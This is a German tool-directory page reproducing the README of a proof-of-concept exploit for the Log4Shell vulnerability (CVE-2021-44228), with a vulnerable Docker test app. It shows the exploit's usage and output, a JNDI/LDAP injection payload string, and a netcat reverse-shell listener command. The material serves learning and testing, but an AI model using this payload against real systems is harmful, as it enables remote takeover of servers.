Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/kozmer/log4j-shell-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungArchived
GitHubkozmer/log4j-shell-poc

log4j-shell-poc

Ein Proof-of-Concept für die Schwachstelle CVE-2021-44228.

Repository anzeigen
1.9k541vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

log4j-shell-poc

Ein Proof-of-Concept für die kürzlich entdeckte Schwachstelle CVE-2021-44228.

Kürzlich wurde eine neue Schwachstelle in log4j entdeckt, einer Java-Logging-Bibliothek, die sehr weit verbreitet ist, z.B. in Elasticsearch, Minecraft und vielen anderen.

In diesem Repository gibt es eine beispielhafte anfällige Anwendung und einen Proof-of-Concept (POC)-Exploit dafür.

Proof-of-concept (POC)

Als PoC gibt es eine Python-Datei, die den Prozess automatisiert.

Requirements:

root@kitploit:~
pip install -r requirements.txt

Usage:

  • Starten Sie einen Netcat-Listener, um eine Reverse-Shell-Verbindung zu akzeptieren.
root@kitploit:~
nc -lvnp 9001
  • Starten Sie den Exploit.
    Hinweis: Damit dies funktioniert, muss das extrahierte Java-Archiv jdk1.8.0_20 heißen und sich im selben Verzeichnis befinden.
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://localhost:1389/a}

Listening on 0.0.0.0:1389

Dieses Skript richtet den HTTP-Server und den LDAP-Server für Sie ein und erstellt auch das Payload, das Sie in den anfälligen Parameter einfügen können. Danach sollten Sie, wenn alles gut gelaufen ist, eine Shell auf dem lport erhalten.


Anfällige Anwendung

Es gibt eine Dockerfile mit der anfälligen Webanwendung. Sie können diese wie folgt verwenden:

root@kitploit:~
1: docker build -t log4j-shell-poc .
2: docker run --network host log4j-shell-poc

Sobald es läuft, können Sie es unter localhost:8080 aufrufen.


Die Java-Version herunterladen.

Oracle stellt dankenswerterweise ein Archiv für alle früheren Java-Versionen zur Verfügung:
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html.
Scrollen Sie nach unten zu 8u20 und laden Sie die passenden Dateien für Ihr Betriebssystem und Ihre Hardware herunter. Screenshot from 2021-12-11 00-09-25

Hinweis: Sie benötigen ein Konto, um das Paket herunterladen zu können.

Nachdem Sie das Archiv heruntergeladen und entpackt haben, finden Sie java und einige verwandte Binärdateien in jdk1.8.0_20/bin.
Hinweis: Stellen Sie sicher, dass Sie den JDK-Ordner mit demselben Namen in dieses Repository extrahieren, damit es funktioniert.

root@kitploit:~
❯ tar -xf jdk-8u20-linux-x64.tar.gz

❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)

Haftungsausschluss

Dieses Repository ist nicht als Ein-Klick-Exploit für CVE-2021-44228 gedacht. Der Zweck dieses Projekts ist es, Menschen zu helfen, diese Schwachstelle zu verstehen und vielleicht ihre eigenen Anwendungen zu testen (es gibt jedoch bessere Anwendungen für diesen Zweck, z.B.: https://log4shell.tools/).

Tool herunterladen